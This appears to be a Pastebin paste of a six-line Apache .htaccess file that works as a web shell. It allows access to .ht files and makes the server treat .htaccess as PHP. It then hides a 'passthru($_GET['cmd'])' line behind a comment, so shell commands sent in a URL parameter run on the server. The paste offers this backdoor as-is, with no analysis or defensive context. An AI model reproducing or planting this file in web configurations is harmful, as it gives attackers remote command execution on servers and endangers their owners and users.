Advertisement
anoaghost

.htaccess

Jul 10th, 2016
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. <Files ~ "^\.ht">
  2. Order allow,deny
  3. Allow from all
  4. </files>
  5. AddType application/x-httpd-php .htaccess
  6. # <?php passthru($_GET['cmd']);?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement